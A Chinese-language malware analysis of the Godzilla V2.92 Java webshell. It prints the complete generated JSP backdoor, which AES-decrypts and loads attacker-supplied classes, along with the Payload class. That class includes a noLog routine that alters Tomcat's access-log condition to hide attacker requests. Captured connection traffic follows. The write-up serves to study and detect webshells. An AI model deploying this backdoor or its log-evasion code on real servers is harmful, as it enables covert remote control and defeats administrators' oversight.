知名的一些WebShell管理工具:
| WebShell名称 | 开发语言 | 地址 |
|---|---|---|
| 中国菜刀(Chopper) | C | https://github.com/raddyfiy/caidao-official-version |
| 中国蚁剑(AntSword) | JS | https://github.com/AntSwordProject/antSword |
| 冰蝎(Behinder) | Java | https://github.com/rebeyond/Behinder |
| 哥斯拉(Godzilla) | Java | https://github.com/BeichenDream/Godzilla |
| C刀(Cknife) | Java | https://github.com/Chora10/Cknife |
| Weevely | Python | https://github.com/epinna/weevely3 |
这里分析一下Java开发的WebShell。了解某一类工具可以从工具大体的框架入手,然后看一下关键模块的实现特点。先来说一说哥斯拉早期的版本V2.92。
哥斯拉V2.92
WebShell管理工具最基础的功能包括:
(1)生成一个特定的木马
GenerateShell
(2)使用WebShell管理器连接该木马
哥斯拉基础配置
(3)木马连接成功进入到WebShell终端
终端具备的功能如下,最核心的是命令执行、文件管理、数据库管理。
WebShell终端具备的功能
1. 生成的Java哥斯拉木马
哥斯拉有一个功能叫GenerateShell,需要输入密码、密钥、有效载荷、加密器。这里以Java为例,Java有效载荷称为JavaDynamicPayload,加密器有两种,Java_AES_BASE64和Java_AES_RAW。
选取BASE64加密器后,生成的jsp文件大致如下,密钥默认为key,但是在生成的jsp中是一串字符串。字符串“key"进行md5加密(32位小写加密)结果为3c6e0b8a9c15224a8228b9a98ca1531d,截取前16位即为xc的值。所以可以看出首先要对传入的密钥进行md5加密后取前16位处理。
JSP源码
<%!
String xc="3c6e0b8a9c15224a";
String pass="pass";
String md5=md5(pass+xc);
class X extends ClassLoader{
public X(ClassLoader z){super(z);}
public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }
public byte[] x(byte[] s,boolean m){
try{
javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");
c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));
return c.doFinal(s);
}catch (Exception e){return null; }
}
public static String md5(String s) {
String ret = null;
try {
java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");
m.update(s.getBytes(), 0, s.length());
ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();
} catch (Exception e) {}
return ret;
}
public static String base64Encode(byte[] bs) throws Exception {
Class base64;String value = null;
try {
base64=Class.forName("java.util.Base64");
Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);
value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });
} catch (Exception e) {
try {
base64=Class.forName("sun.misc.BASE64Encoder");
Object Encoder = base64.newInstance();
value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });
} catch (Exception e2) {}
}
return value;
}
public static byte[] base64Decode(String bs) throws Exception {
Class base64;byte[] value = null;
try {
base64=Class.forName("java.util.Base64");
Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });
} catch (Exception e) {
try {
base64=Class.forName("sun.misc.BASE64Decoder");
Object decoder = base64.newInstance();
value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });
} catch (Exception e2) {}
}
return value;
}
%>
<%
try{
byte[] data=base64Decode(request.getParameter(pass));
data=x(data, false);
if (session.getAttribute("payload")==null){
session.setAttribute("payload",new X(pageContext.getClass().getClassLoader()).Q(data));
}else{
request.setAttribute("parameters", new String(data));
Object f=((Class)session.getAttribute("payload")).newInstance();
f.equals(pageContext);
response.getWriter().write(md5.substring(0,16));
response.getWriter().write(base64Encode(x(base64Decode(f.toString()), true)));
response.getWriter().write(md5.substring(16));}
}catch (Exception e){}
%>
如果查看哥斯拉的shell->cryptions->JavaAes->template->shell.jsp文件,会发现jsp的模板文件分为两部分,上半部分对应globalCode变量,下半部分对应code变量。
<%!{globalCode}%><%{code}%>
下半部分的code变量逻辑如下
(1)密码后传入的数据进行base64和AES解密,赋值给data
(2)通过session中有没有payload属性判断是否第一次访问shell。第一次访问:把传入的data的Class对象(此时的data是payload.class的内容)放入payload。
(3)非第一次访问shell,将data放入request的parameters属性,从session中取出payload对应的Class并实例化为f对象。然后将上下文对象传递给f。并根据传入parameters参数的指令触发payload执行。
下半部分有两个方法:equals和toString,前者传递页面上下文,后者执行方法调用
2. Payload.class
Payload.class包含的一些属性和方法
/* 属性 */
PageContext pageContext;
HashMap praameterMap = new HashMap<Object, Object>();
/* 方法 */
Class g(byte[] b) :类加载
String get(String key):获取praameterMap某个键的值
byte[] getByteArray(String key):获取praameterMap某个键的值
// Shell相关
byte[] run() :核心方法,根据praameterMap中获取的evalClassName和methodName调用方法
void formatParameter():{"ILikeYou":"bWV0b28="} praameterMap,又将praameterMap放入request的parameters属性
boolean equals(Object obj):判断对象是否为PageContext类型
String toString():调用run方法,并清空request的parameters属性
byte[] test():返回"ok"的字节码
void noLog(PageContext pc):清空日志
// 文件管理
getFile()、listFileRoot()、readFile()、uploadFile()、newFile()、newDir()、deleteFile() 、moveFile() 、copyFile() 、deleteFiles(File f)
// 命令执行
byte[] execCommand()
// 基础信息
byte[] getBasicsInfo()
byte[] include()
Map<String, String> getEnv()
String getDocBase()
String getRealPath()
// 数据库管理
byte[] execSql()
// 反射
Object invoke(Object obj, String methodName, Object... parameters)
Method getMethodByClass(Class cs, String methodName, Class... parameters)
static Object getFieldValue(Object obj, String fieldName)
// Base64操作
String base64Encode(String data)
String base64Encode(byte[] src)
byte[] base64Decode(String base64Str)
Payload.class很长,一步步拆开来看,payload类同样继承自ClassLoader实现了类加载。
public class payload extends ClassLoader {
public payload() {}
public payload(ClassLoader loader) {
super(loader);
}
public Class g(byte[] b) {
return defineClass(b, 0, b.length);
}
Shell相关
(1)run
run方法从praameterMap中获取类名和方法名,没有类名就在此payload类中寻找方法,然后invoke调用方法。然后从session属性中找该类名,如果找到了就进行实例化,然后执行equals和toString
public byte[] run() {
// 从praameterMap中获取"evalClassName"和"methodName"
String className = get("evalClassName");
String methodName = get("methodName");
if (methodName != null) {
// 如果没有类名就从此Payload类中获取方法
if (className == null)
try {
Method method = getClass().getMethod(methodName, null);
// 方法返回类型必须是byte[]
if (method.getReturnType().isAssignableFrom(byte[].class))
return (byte[])method.invoke(this, null);
return "this method returnType not is byte[]".getBytes();
} catch (Exception e) {
return e.getMessage().getBytes();
}
try {
// 从session属性中查找类名
Class evalClass = (Class)this.pageContext.getSession().getAttribute(className);
// 如果找到了就对类进行实例化
if (evalClass != null) {
Object object = evalClass.newInstance();
object.equals(this.pageContext);
return base64Decode(object.toString());
}
return "eval class is null".getBytes();
} catch (Exception e) {
String message = e.getMessage();
return ((message == null) ? "java.lang.NullPointerException" : message).getBytes();
}
}
return "method is null".getBytes();
}
public String get(String key) {
try {
return new String((byte[])this.praameterMap.get(key));
} catch (Exception e) {
return null;
}
}
(2)equals
equals方法,判断传入的Object对象是否是PageContext类型的,如果是,就赋值,并格式化参数
public boolean equals(Object obj) {
if (obj != null && PageContext.class.isAssignableFrom(obj.getClass())) {
this.pageContext = (PageContext)obj;
formatParameter();
noLog(this.pageContext);
return true;
}
return false;
}
(3)toString
toString方法,调用run,根据参数动态选择对应的方法并执行,然后清空request的parameters属性参数
public String toString() {
String returnString = new String(base64Encode(run()));
this.pageContext.getRequest().setAttribute("parameters", null);
return returnString;
}
(4)noLog
noLog方法,清空日志。这个可以联想到Spring4Shell漏洞,都是用到了AccessLogValve,该类的父类AbstractAccessLogValve中有一个属性为condition,用来设置是否记录日志,如果ServletRequest.getAttribute()为null,就会记录请求。另外,如果要记录特定的请求,例如参数为shell的,需要ServletRequest.getAttribute("shell")为null。
想要获取AccessLogValve这个阀可以从pipeline入手,容器中的Engine、Host、Context的pipeline相互连接。所以从StandardContext开始,获取它的父类StandardHost、StandardEngine,然后获取它们的pipeline,找到AccessLogValve
经过调试会发现,StandardHost的First阀就是AccessLogValve。通过getConditiion方法获取condition的值,会为null,代表日志会被记录。哥斯拉是将condition的值改为了FuckLog,也就是只有当传入属性为FuckLog时日志才会被记录。这样攻击者访问服务器的请求就不会被记录了。
private void noLog(PageContext pc) {
try {
Object applicationContext = getFieldValue(pc.getServletContext(), "context");
Object container = getFieldValue(applicationContext, "context");
ArrayList<Object> arrayList = new ArrayList();
while (container != null) {
arrayList.add(container);
container = invoke(container, "getParent", null);
}
for (int i = 0; i < arrayList.size(); i++) {
try {
Object pipeline = invoke(arrayList.get(i), "getPipeline", null);
if (pipeline != null) {
Object valve = invoke(pipeline, "getFirst", null);
while (valve != null) {
if (getMethodByClass(valve.getClass(), "getCondition", null) != null && getMethodByClass(valve.getClass(), "setCondition", new Class[] { String.class }) != null) {
String condition = (String)invoke(valve, "getCondition", new Object[0]);
condition = (condition == null) ? "FuckLog" : condition;
invoke(valve, "setCondition", new Object[] { condition });
pc.getRequest().setAttribute(condition, condition);
valve = invoke(valve, "getNext", null);
continue;
}
if (Class.forName("org.apache.catalina.Valve", false, applicationContext.getClass().getClassLoader()).isAssignableFrom(valve.getClass())) {
valve = invoke(valve, "getNext", null);
continue;
}
valve = null;
}
}
} catch (Exception exception) {}
}
} catch (Exception exception) {}
}
(5)formatParameter
这一步看似复杂,实际上只做了一件事,无论parameters获取到的值是什么,只是将{"ILikeYou":"bWV0b28="(value实际为字节码形式,如果base64解密为metoo)}放到request的parameters属性中
public void formatParameter() {
String parameterString = (String)this.pageContext.getRequest().getAttribute("parameters");
parameterString = String.valueOf(parameterString) + "&ILikeYou=" + base64Encode("metoo");
String[] parameters = parameterString.split("&");
for (int i = 0; i < parameters.length; i++) {
String onePraameter = parameters[i];
int index = onePraameter.indexOf('=');
if (index != -1)
try {
String name = onePraameter.substring(0, index).trim();
String value = onePraameter.substring(index + 1, onePraameter.length());
this.praameterMap.put(name, base64Decode(value));
} catch (Exception exception) {}
}
this.pageContext.getRequest().setAttribute("parameters", this.praameterMap);
}
如果此时再回看jsp下半部分,就有了更深的理解。第一次访问Shell时,先把Payload这个类放入session的payload参数中,然后实例化之后就可以调用其中的方法。之后再访问Shell时,下半部分核心就下面两步。
// 1
f.equals(pageContext); --> formatParameter + noLog
// 2
f.toString();
- 先把
{"ILikeYou":"bWV0b28="}放入praameterMap,另外将整个praameterMap放入request的parameters属性中,更改日志访问记录为特定参数才记录。 - 调用run方法。从praameterMap中获取"evalClassName"和"methodName"执行相应的方法。run方法执行完成后,清空request的parameters属性,返回run的返回值
3. WebShell管理器连接木马
WebShell管理器连接界面的标题是ShellSetting,UI相关的类是/core/ui/component/dialog/ShellSetting.class,找到测试连接按钮对应的代码testButtonClick。
private void testButtonClick(ActionEvent actionEvent) {
if (this.updateTempShellEntity()) { //获取页面中传入的参数,分别赋值给shellContext对应的字段,shellContext对应的类是ShellEntity
if (this.shellContext.initShellOpertion()) {
if (this.shellContext.getPayloadModel().test()) {
JOptionPane.showMessageDialog(this, "Success!", "提示", 1);
} else {
JOptionPane.showMessageDialog(this, "Payload Test Fail", "提示", 2);
}
} else {
JOptionPane.showMessageDialog(this, "initShellOpertion Fail", "提示", 2);
}
} else {
JOptionPane.showMessageDialog(this, this.error, "提示", 2);
this.error = null;
}
}
实际功能代码位于JavaShell.class的test方法
public boolean test() {
ReqParameter parameter = new ReqParameter();
byte[] result = this.evalFunc((String)null, "test", parameter);
String codeString = new String(result);
if (codeString.trim().equals("ok")) {
return true;
} else {
Log.error(codeString);
return false;
}
}
其中调用的evalFunc方法,praameterMa添加className为空,methodName为test。在run方法的分析中知道如果从praameterMap中获取"evalClassName"为空,就调用Payload类中的方法,也就是调用Payload.test(),该test方法的返回值就是ok,所以这一步也是在测试能否连接上Payload类。
public byte[] evalFunc(String className, String funcName, ReqParameter praameter) {
if (className != null && className.trim().length() > 0) {
praameter.add("evalClassName", className);
}
praameter.add("methodName", funcName);
byte[] data = praameter.format().getBytes();
return this.http.sendHttpResponse(data).getResult();
}
ReqParameter.format
public String format() {
Iterator<String> keys = this.hashMap.keySet().iterator();
StringBuffer buffer;
for(buffer = new StringBuffer(); keys.hasNext(); buffer.append("&")) {
String key = (String)keys.next();
buffer.append(key);
buffer.append("=");
Object valueObject = this.hashMap.get(key);
if (valueObject.getClass().isAssignableFrom(byte[].class)) {
buffer.append(functions.base64Encode((byte[])valueObject));
} else {
buffer.append(functions.base64Encode(((String)valueObject).getBytes()));
}
}
String temString = buffer.delete(buffer.length() - 1, buffer.length()).toString();
return temString;
}
4. 哥斯拉连接流量
根据上面jsp的分析知道,第一次连接是发送Payload类
第一次请求
请求头部,请求的地址就是哥斯拉JSP所在的服务器访问URL地址
POST /MemShellShowTest_war_exploded/gsl_v2_92.jsp HTTP/1.1
User-Agent: Java/1.8.0_241
Host: localhost:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 33035
请求Body
pass=0%2FMHwbBP6vuX0WyYztOU9DrUPcD0Zwx0KhArobwwHBDld91Y8xrUqPxo40dKoSbGd%2FxDF4yJopsUIHMI8NMfFUl0oxBzWPyMdTmxAntagmMGLGiqB1ckbl5G%2FlapnewWrvhhdqtj0eT2zvUes%2Bg6yhFGVjLstoOdJxkYPY6XB70AeffugDlCkUYAyHyrTymPocUs14sKD5ItAn5147goo9TAdBH0kgSNlxbqxMqTPbgjKljsvC53fFB%2BO5jKUBCBvsCR1W%2FLhPA42qp1e%2Fl0cmUohwSAT3N0s9r%2FzRVlB3lQkXnV895dz48DyPbYjJp%2Bhpf1qFjbCy1o8Zd771ObGbKvWr1O5PZOTNKBu%2F%2FO2rbaC4ktNJrKmdUmNg3Dbv%2FJPbp22uOvBAebeBBE7msJ0XAXeBDJqARAUm34Z0trtU5IhQ%2BSTSk0RyCW5RRPLV%2BffkyW%2FAL8MuJrOxRVdo7nllbEIPvti1pPgJHn64s9sayyHbxH90rbg%2FA6%2BWktyctn9VYc8lcBwoTWWsbGU3oAaMl6KlawaVDNPypy%2Bk5TRNVinbU76YnZi5GJPsHy%2FUuT2NOvl8czGOGBiSIjU3xwL6Qo1gHLjMrt6yviqsBgH95gIq3iDwqKYnj3i3okpBSdAq%2FCgoolcEz5xQOunIyZG05YUNABMCaF6btQn1Q2CoEV3ZZAsU21c%2FycQj6racIAIc1NdiGlXD4CF%2BLfs%2F9HAxCWS6WclvZGS5ruq0aYz47Qb%2FjPMONkxkC35vPaLlksdbVMxMhTWjTFKYXbHe0KzPau9ZCFKwUPX3t%2BBGlRjvDnYH6mFJrHLz2bpD3EbxAEX4TYBQrhcJzlCJPWgeFHme2sXm274nd9%2Fx8HIXiDseGm6Mzd29OoKbmM2NaQ26snJffck%2FsxxdlrLoap8CTaZbOlNx%2FW0qZymhTOfkLLDhXyFMaRM45SoNtiw5iNbuFxHhBLAYSOGUm2G08WJUJ%2F7xPvtO15yupLCrlj0zNPOeHOxQhhdcZXxaZVc7jxnDKsdb54RBnND60%2F9rv4HTMsps%2F839GWaybuvKdJ7H4FVVujal8IwvYZEENRR9oVF2v64k1SkWuT1xOUcuplRB9rsCXt2XWYeGISfllgNsmqzKVGguBmLUanClNQgCF9AElGt4Pt45Nege6Mvwz7QYFpIDiIpTzXQXHB5Mhw0CiCNsJlPp9ZXePA3WS45mIpsjk8DSNpw8pzDj1l1qUglFw545VsX%2BSKjfQgatWgXVbRr1DEdS6zI%2BTw6dsWsp3fuj7mxqkcxZn3Bp3W9W0gwj%2BCtVZCJPJzUIQeFyDMXNuNymgKFIq9jAYhByCjCJ%2BzPT2bEbT5ERJFW39n0tEx3cEcFdB%2BtrbwuAFtj7MEC70%2BpFVsngliiDUbxpmA2KqYeJLJUJ552XsBz2ewkD1B8Vbwm31CSFgs7utieyAGXlfpbkDA9sVcGONe4%2B9AQvZ2fCOCwLY5abPqftD4soJaWLviSe7jihPDMmWmFhCCBFOTaCKZvRN5fnf9dwFz6pciVN26jbsLARGSh6G2h7ukaApcbyKMrq6elDaZp5iY85eKQJQ40hZKEL0DdTYYYWQDFqZoTB%2BFQL1pOdrROoUVTXAGSzsExG1QHVH5McQylewTr74nqLjpMQiiLVhTI5lKT%2Bvl4lZVL7QWkkPQ1DQcMQurRgrH3a12a1Li8JskEPdAGcTydwcSVjp%2BHUXgWoAd1zqSevBdbq7HZoFuNX40PS%2B1qcWiX5BtG8q2Tl6yPkrVShOjoVsvpNEthNXElIHVcdUg%2BoWS4c3728F401kmsiP3yoV4QNWF%2FQFIg0cgVRg7i6pDhBUtgkk%2FFqQaKPtg%2B3HLHv5Kqm3xzhtFk76kY9kNtPuh7hWxZSnGP%2BqjTLBrRSbVSzYcnSXUxxOx0AqBcSodj6n86Vnp7uL6PCETi6W5m6gxz%2FZWfOOG8hFnYFpJsTaRMEOClQmP4Xwuq9LNMW%2F2PILjHkBGmueYjSVzetR2vTQBVddWZ0fp9IcyVPNMeERKWH53GJL%2FCHZwVLXR%2Ba4p5FOX2X64thqS52L%2F%2Bu%2F1I2AgSylH1LexAMvBM1ZWG17hbAEcsIK%2BMJNykLJji2UILcJ4BdU2oUtQc92Dj44T%2BfqTucaSsAdyDOEFyb2SD2JtDlHXTMVYX30xReCm15E3J%2FVpn%2BpqHy7YOYGjpkNqjtQxs6EC3ekhySsIzdKpq0%2F%2FEDvWjLi%2FdZB1AaLndApumilCisxV3LssxbfFUmazeYgToURocx%2BG0mtaFQBAqLX1j3djhuzBRQQoCd8XdMeM9BYXUtvauQpDoqOC1Z31DjOQPvNAVx7uOG65ifxj1g0cY4YvhMdWsIjjoW7PlC7zleqrAomuipdfwNfzkvyWYum%2F919hteBH66gf1KK2Mv81N529ngtocBw2ZIZmv1YAl4YG7PYe6tuDXDifB2CYYfP6yRpgVnO8hswTzqPC5PJAlzpxNhoWMFxHfvOZYBbKUl3%2BoFDtPXDtG2zjlt4H3mGhG0NH%2FQ%2FAGO%2FgFgkqrUTQfra28LgBbY%2BzBAu9PqRVBvEdDi%2BcKdzkJDRV6HQ140z%2BctjR0EpzSRGv7eFdhuSQVlNmktHwjdelrld63QNvXLubx2urd6PePhr4SexTWLFVZ50csYssUBX0v1V%2Bp9doF%2FDy64GKjcriJmv50cidhZYY6DN5NwYWzZ%2B7%2FB1nu93QKEgaeqsg0YGqltJeOn2kJtPa28ciSt0dZbHLxtS44dviZ4wzQKodL45ZwrN3FvQgfBPJxD6LPoLKPbqteSzO%2FstKLmb%2FWW%2Bbb%2Bm0Sf8kwaZnX8JshNjFkLGh90lVyM9JRIlwmmVOQucLuk4gCIgWJaQnTTeVlHH2DCF909Iw1N3QIxjIv%2FCTI9E2EcdJpasYuWkKnji5r97QUgzIs1ARPJxbfRQqMKWpNBCFDGnGzo5ml%2Bm8MoZkp5%2FViiHBAmSYA49PtRyj6jaVFhWseBe6ZHAZeGqq4k6N5FUMUaDWeoHJFeCRsiaY9icuLZYP4EaPgXW5MZJ1A1JHl5OCJlCzOe68KmwS5neVzqbOxozQBt3VAtz%2F%2BznOrORdVkGyV%2FoWwG11YpS02sTZOlIH3gma7wvX6NzToFfBPpRcXdbs21xXn5bTtZuy%2BdHbIwJt6PHbft%2BqlkldxFtJejXLqnhj6CVZD5KGoeHV2f4HzJjb9UbYoI1nI2J5WSHNuUe9t0OEFS2CST8WpBoo%2B2D7cct81RjrqqGaqvVusTVUgZPNkTQIBtkMvdIKWkdwwcKbC6g1hgZIdeE2mM7Z%2BO1OVxZyVsJQz%2BEYMKEF3f0W0OZEdo0BxMxtToNwxw2Xk7zTS6DNgK0SjSCXQZ5IktYF2o%2BtrzXiscpAzFmczxJ0OseSBCa6XagbEzVNGmaNJJMwVRD%2Bz2zmERFIbckoDAJr6a6Q%2F%2FROCtJo8hIxqw1hiihaVED8hpcH%2BVVcKe3GJHvngNmEkvyDe9W7h19Uy%2BrS7TvrHUCxSriYk%2FZQbKiHy3E2QasEoBxf04fbnVFNM%2FjWdb4VqHgOwTfK4c7GXubzLRa0PA%2BA3rL3rRnWTDBTACL2rUwAtOjXB0u4AX3pTG5wRABzvSCKwPTZTJxmPhith3ZDi9IAvqn52mvgdIoifKIz0ZTg%2FZYXh2jLkuSxD8ZKFdrzRrhKpiq09%2BMe7kzc9ULqrZglAkQDEgAtllabsp0cFJEzMSeevJXrPrQSHX7NqBY4OI4rHd17lQ2faayXycluAZr2mtNZ6KJ%2Byp0%2BMStOdo0BxMxtToNwxw2Xk7zTS6HEuEOK5ak1KgY7vWCBg33FAzNB72W%2FJkKmjt%2BHWD71895mxA3HMyk7Dq3J61JBAra6il8On24g90VCXPnau%2BlwQBEMiKBwiylW3Bg1QqGYv4IZuC4KOFCDFkmNZ4QzVvLn4L41G8q6RM3jLdwa2wJYEiEgC7EkBedX7BgDBviVocjtcmfVEeu9psZLFjMzTkFhIxNRqtrV973j0Harn8ihcSI%2FBo3UCV7rwKOG%2FTSipfN83QSi6R9u56y%2B22RDc2CgUXmY5iAmcd1FPS3bz4lElsOcKpynB5h94%2BU8CLS0AKWbnuK1ZKgQ6AZWsPiCTUsg3wlV6Xx6Pu8cuAVls2ZO9Y3OE3vRnR59WcoQ7jbQKw%2FDiAdAPsa10k3ZH11wcN6vCz%2BTRoNFud1N%2ByQqxLFlYYfZ6bv63Fbrls1Q010hbMHfpBH%2BOv5GKGHL3Qq1LBz04%2BZflIQJTwddlWU%2FJEq6fG%2BNYP%2F3Q1bKIV8cPq1K5e3C%2BwlrdU%2F%2F3b%2BZCheoweXk5pYo3cj%2B51dOVF9%2BnSoeSZPBRb%2BpFjjrZgEHQhl0nPc9TjedH8ckMQ2FWPWkBGThTalVMP39WIdN82lbuymR2VQU4%2Flwt0RhLbbmyTKfw%2BJtCx8NNfU0zFKBwLipf4QrcEJRkNN5GCqzwUjTCP%2FbuG7XQycfPzK0HawLshF186tQ2NTR8dGucAWc8k2AOmA3bNF73bN8xf6vvC26PmoGrnvzTNIxyT3VfwI2PggFydg9T9gHaFq76bKZVOmWkpbnCf%2FH0sOM5siFtKk6d%2BO15GoT%2FSyeoXkKx%2BA2jNpCcFJztxRptPj3FDyjym%2FRsRY0mPUUdjsZW3ywXzWaQDLaPgWdYrgFcB%2B6rj8ri2RrbmHG6YPfVxrLfR1Q0mMnyawrWP6lyrXh%2BMp190tIzKv0Lnd%2F%2FY5lC3P%2B%2BdquyUenpeDa97gXcy5KEYRZqA%2B8x4mTbJ1IvmAoqauac0YU9Z6aGkpQ1HmegZySLPD3zrovj4FbvpGgqE4cD5tpuLUwHrixgKOpwhmV8l2iwbIgeNQcp9VX0fbw76Lmby7byn0ncThaHU9ONaYBjVhX7YB0je8zeYIkM7VC11wCqqhIflAD%2FPmyHTqHqyf9%2FKTS%2Fr1Feg7xpbuOsfzbB6OlzX%2FBnotuo5cftKOL5b9gfwx2VDTzSwV%2FEmM4QOKKIVw9RZeUjbLXQI2qZQ6vd2En6n7KB%2BH%2FCR9k85t5nRtci%2BYzpAJ1pyYtFdGKokJSniXqwxY8hLighExL6OwXVAYPqOLV5paY4%2B3NFTDi237copV29aCAXrJEApWibjJmIey27GQYy15Hf8b6H9i7EDqhlbA8J3TAGG3VuZoc6Gv8B3zG5sHpFdHXXE9I4GasrfB%2FlF66e4rJgvWgXDxIvN1XxfHQNPShPVquTdr6OIysDq3L21B8PidWueaptrF2DIfnYPey18WNlgmg7gSlhiH45Xk92%2BH%2FCR9k85t5nRtci%2BYzpAKWvrSnkl2t7d%2FzHXQYIE7NiPOJPJvVS9A71GmJ4tFDX%2BwMjdmmGegdFpNZ5uwjo82QpVORA7zMbH5tA%2BSpU5HaMAmNYOC4a38iJP9tmbLp5wFDO%2F2yeRiazRO6Mp5SUdGz%2BV4utnATs1n%2F481X9iJcPoLzX1mH1HMNqVsuicx2YKbQDuYE2JKrtms1tXj3YDqniBjeAnKNNxZihofeT68qR4U%2B8VjBP%2F8HvpiurvTwMlEk2JQMV%2FhDGKjWBcR76L%2Bgumvug7sNgN4DhMBip%2FHFhF1rY3mv6xxTZJh6h1jGn0MoEriG6BdCb3T9hjsIiN%2BVZ8d%2B9ekfsHbIcAQbA6dipj0P5v7hy%2ByOjLQGnhhzzXDsqDvNyT1vN6Dd6JzOLbeqOfCrBwCvH28LeDJ9ncFrhepw8FnasCeFkAhAdAViZyGhIklbjRvwzSj8vGAPGtaJPoCXt1aDv9TUlLeae%2FTZTisgX1zJ3zvTBDVCTfnV8ypaxsg9i6XRH9q1po9b%2B%2Bqf4SqQ9dVhHp2Yt1biq1BzBmAOAFhJyEcIomZmOvfDpCilAPnf8KS%2FrnhzVxIgmrX7I4ZV9nNXkq%2B841AxFIKW0DqSZQSBHyR%2BGVfu1k6lbZq2%2FmC6x985zcCPos9MPim3TsNweqL5fjCnBriEnHjBtprltBV%2BIFbWrJvxMXwOPdYmofJfoF6mpmqke8QuGlKEyKlpDsjoTQIUWYzDaWMfg5IotNPx4MLi2uhTGGpjQbmYEFJ6LQhMqrcAsdg0Im1P4kdwJJKb6kQmPjBzHzthFAcnufkl4QpWQJoZwZb1o2jOPB7GFJwzoGD4JWgy3%2BvQS1vwqllU4H6cNHzTv5uzDJei2leYEuT1Dhfja5mvc1P7Z65qKTc7Yy5vB%2FSS4qTXXQE3Mtt07ywgVVRRAdsCcmzWB7GEkKhSgCzWJtlAXznKOtoZZ8%2FTqFRqLtKtZPwPI%2FjSM8pJWNa9kynN01P1E6hp3gnvDXpbIt%2Fz11X0XfNnDaKgzHCIgT%2Fcsv%2B5kEAJC8htonBzgPgUbKhfj8%2F%2FhdIj0%2FrTCWpkT%2FvN%2Fsy8FAs%2B021NbBW8K%2FEYnCAxwfCH0BMDWQqOexX6kbgzuZ8wiuyYgPdlaiifqHxnr6crKu1IXB3NzeZRr4xLPDGvS6HA1cjfye57r2aJVV4N9CM%2FQFuEaFs9gIdamvdx%2F%2BmS8j%2FPRRqr6eDVWoim3tx1T66LHTCC6D0zP%2Bn%2FTtx2bycry3tYoXcj2Ela%2BllV06Zv23KZURijguIsIscgg6HpKsjQq%2BvsXLvKNcxGhrXebTfZpPdCgKQPr5UPgzlncm9ameFsARywgr4wk3KQsmOLZQiENfZselCx6s1mNAFSsrzs0J3AJ16z22CtxMp3YVLkXkOEFS2CST8WpBoo%2B2D7ccvHF%2BPOzwZH8pXI0v7sQFtVJDW5GL3zGBzNmyIy1KljEo3Qp6oHwP0zKD7yAyTSUJq0E9a%2F3bNSPOLlU%2BO0uM8MG1hhKXTOAKI1G1Z1ShkJnuSsYPyPnlxEBx%2FTGILTKrDcYlKXrEid8VSdmdxWMAsttFdnya50jRNeZIxcuZ0npy2PK%2FQTOrw74O7Xa33T9i1pWa16W%2FG3T6p4pkSxBmUh502LZk0Xq6BlcSVyUYe8MYbK7EzXe84g1Vx9MTFtCvclCHZsOiysPWekEPab8gxgnP2QtA0nfRgedaxRoVNvHr3ECdL0womaC5MG14t3ZXz%2B705GbKPb6sLJEB15IT1JKi4xIMAB2gY7B6uWdwQAJGJvWOVZZ5ZaUglULiQ8OLEtVthhXC62pCoi3PeQa09Jy9wvDWvWPUcrR4lZnlY0h%2Fo28ZDXQ6Lb6ZcHYmuOgukHsn4GpDAuyub32hJRWbgFodqa9Q5K2iSqSqumKE27tYgOF9M1igmx9M6js7diwEeGEmq38N8OnOLYpRcrlC5WkpG2QAHncG8jS8wAokhekdno9yxiUwihLPWk5%2BaWB3iiBzHxB3X%2BjstAkdNX4UUjw1%2BKSOmf2eg4d3CB0mk0af3wkiDSFXswec5cmlTukOizsQfoJTUEMrgJDkKrZJu7BQsW9iMyHd6UOhUbU4mCcexRE47reZn6XVCl2vL41oyYDtcIOu9LPUlvIdlkvuHdPASi%2F4mJpP4Fv7AjSOsoJprZ5tVSsvmNQE865y%2FV6j2t8y2fCjBW1VZ3bkVya%2Fe1M%2FTZkPSclH4tmjh%2B1pTNJEA0Ql9ndm5V%2B%2BfwbO9Hw3Vh60AXFc77lxKdbc10rZWBy5BA6%2FhxWcfnLLVFqjfXlkLTkg%2FBnkIal2nMSnI95a9AVwUnQw7fzbI74yxB57OFn6q6d%2BiYwhmUb5LRo%2BbEZqiKrqucmxocylopB4iZ5aVXKsaTKOU90Px9uvKO028GO3Yw6%2Fd04J%2BV4skZq%2BsBct5FSTyLiPHtse8yz7ZP%2FOV3hHKyN7kYfaJGjqBE0R2ShPDV997qriskx5GIRpK7WlVhP2lFPb4gJYD%2FtR3jDopMVFRZ4nKyw2FqTWsUyJM%2Fo5QWXpjRLFJWekWQmHB7ZUu0bXwwXwzBf7JDiAMODjNHlTZ3NLfrrrVk6fwHqSrIW3gUDxe9oBVoVpsUy3EYnDMi4IxzJ2uVoVFbOC7bxMgQkPr2R1Z1yWuG29XfW5Ir7Uzd1NuFU245F1KBoibSgqa4KRD1dhZ38wf1YefXeBbay0%2FhTDbz17hdeYw8GpSfGWYgbILhV59UWGNtciq3An1%2B%2BG1PdgJx8w60d5pv7VUn7jfzRi0lE1NeH3Hy15gurEwKgDKye1Ms6B7ISOisrAg7VO4kI%2BpaWCGGGKmWYjpUBn2sYvh1Jv4B79NCYr6SCg%2Fg%2BIiiPLnM2kZjCK2%2FJ6Ny8UnyESxEi3OFHxSAhPx5SUVBeT58RrVHr4r0bpoW8mJubqDkv4D2E9BboNim%2B6dHeBmRHkYyQgTgHLe6lSTuBG3mp56%2F%2FYU6P1Vpl3SKVtrPR%2FvM3WPNH9g6zeYL3WjmqCh2%2BZu8A6vxPgyxvxAfguQq3HbSqbhEpEublJwxncPTx59OHqrxzDkzpPk226Ro8OWFrQ49rPRx1xJxtrh3PPg3y5t8cLAJmTmydbP2m6hL1bQKluUjOUT0wOIsOpClZ6y35P8m3XUoYW%2FmgXnFHubslaixybtkH8UqfvAdM1LTetpBzKidGl%2BnjMfq8yArpx